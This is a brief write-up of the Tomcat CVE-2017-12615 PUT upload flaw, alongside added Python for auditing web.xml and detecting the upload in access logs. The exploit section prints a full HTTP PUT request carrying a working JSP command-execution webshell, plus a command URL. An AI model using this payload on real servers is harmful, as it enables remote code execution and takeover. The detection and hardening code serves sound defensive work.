CVE-2017-12615
First, Tomcat needs write access enabled, so that we can place files on the server.
We start by uploading a JSP file:
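The write access mentioned above is controlled by the `readonly` init-param of Tomcat's DefaultServlet in conf/web.xml; when it is `false`, HTTP PUT and DELETE can create and remove files. The following is an added example, not code from the original post, that audits a web.xml fragment for that setting. The two XML fragments are constructed sample input; the function name `default_servlet_readonly` is my own.

```python
import xml.etree.ElementTree as ET

# Constructed sample: DefaultServlet block from a Tomcat conf/web.xml with the
# weak setting (readonly=false) that lets HTTP PUT write files into the webapp.
WEAK_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
  </servlet>
</web-app>
"""

# Same fragment with the hardened setting. readonly=true is also what Tomcat
# uses when the parameter is absent, so removing the init-param is equivalent.
HARDENED_WEB_XML = WEAK_WEB_XML.replace(
    "<param-value>false</param-value>", "<param-value>true</param-value>"
)

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"


def _local(tag: str) -> str:
    """Strip the XML namespace so the check works with or without the web-app xmlns."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name: str) -> str:
    for child in el:
        if _local(child.tag) == name and child.text is not None:
            return child.text.strip()
    return ""


def default_servlet_readonly(web_xml_text: str) -> bool:
    """Return True if the DefaultServlet refuses PUT/DELETE (readonly), False if it is writable.

    An absent readonly parameter is treated as True, matching Tomcat's default.
    """
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != DEFAULT_SERVLET:
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            if _child_text(param, "param-name") == "readonly":
                return _child_text(param, "param-value").lower() != "false"
        return True  # DefaultServlet declared without readonly: Tomcat default is read-only
    return True  # no DefaultServlet declaration in this fragment: Tomcat default applies


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        state = "read-only" if default_servlet_readonly(xml) else "WRITABLE via PUT"
        print(f"{label}: DefaultServlet is {state}")
```

Run it against a real conf/web.xml by reading the file into a string; a `False` result means the server accepts PUT uploads and the setting should be changed back to `true` (or the init-param removed) unless write access is genuinely required.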
PUT /a.jsp/ HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=91DD89FBCC1307A04A8D6993DBF39919
Connection: close
Content-Length: 414

<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
Now we can happily enter commands from the browser:
http://172.17.0.1:8080/a.jsp?cmd=whoami
We can also just connect with Cknife directly and get to work.
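The upload and the follow-up request above leave a characteristic trace in Tomcat's access log: a PUT whose target contains `.jsp` (with the trailing slash that the servlet ignores), followed by requests to that same path. The following is an added detection example, not part of the original post, that runs over constructed access-log lines in Tomcat's default `%h %l %u %t "%r" %s %b` format. It flags any PUT or DELETE to a `.jsp` path regardless of what follows the extension, so the trailing-slash form is caught without the rule depending on it, and then flags later requests to a JSP that such a PUT successfully created. The function names and sample lines are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample log lines (not from a real server). The first two mirror the
# upload and command request shown above; the last two are benign traffic.
SAMPLE_LOG = """\
172.17.0.2 - - [01/Oct/2017:10:15:30 +0800] "PUT /a.jsp/ HTTP/1.1" 201 -
172.17.0.2 - - [01/Oct/2017:10:15:42 +0800] "GET /a.jsp?cmd=whoami HTTP/1.1" 200 12
10.0.0.5 - - [01/Oct/2017:10:16:01 +0800] "GET /index.jsp HTTP/1.1" 200 4512
10.0.0.7 - - [01/Oct/2017:10:16:09 +0800] "PUT /upload/report.txt HTTP/1.1" 201 -
""".splitlines()

WRITE_METHODS = {"PUT", "DELETE"}


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def normalize_jsp_path(target: str) -> str:
    """Decode the path, drop the query string and any trailing '/', and lower-case it,
    so '/a.jsp/' (the PUT) and '/a.jsp?cmd=...' (the later GET) both become '/a.jsp'."""
    return unquote(urlsplit(target).path).rstrip("/").lower()


def find_jsp_writes(lines):
    """Return alerts for write-method requests to JSP paths and for any later request
    to a JSP path that such a write created (HTTP 201/204 response)."""
    alerts = []
    created = set()  # normalized paths of JSPs that a PUT successfully created
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = normalize_jsp_path(rec["target"])
        base = {"ip": rec["ip"], "time": rec["time"], "method": rec["method"], "path": path}
        # ".jsp" anywhere in the decoded path also covers .jspx and suffix tricks
        if rec["method"] in WRITE_METHODS and ".jsp" in path:
            alerts.append({**base, "reason": "write method to JSP path"})
            if rec["status"] in ("201", "204"):
                created.add(path)
        elif path in created:
            alerts.append({**base, "reason": "request to JSP created via PUT"})
    return alerts


if __name__ == "__main__":
    for alert in find_jsp_writes(SAMPLE_LOG):
        print(f'{alert["time"]} {alert["ip"]} {alert["method"]} {alert["path"]}: {alert["reason"]}')
```

Feed it a real access log with `find_jsp_writes(open(path))`. The write-method rule fires on the upload itself even when the PUT is rejected, which is still worth seeing; the second rule only fires once the server has answered 201 or 204, so it points at files that actually landed and need to be removed.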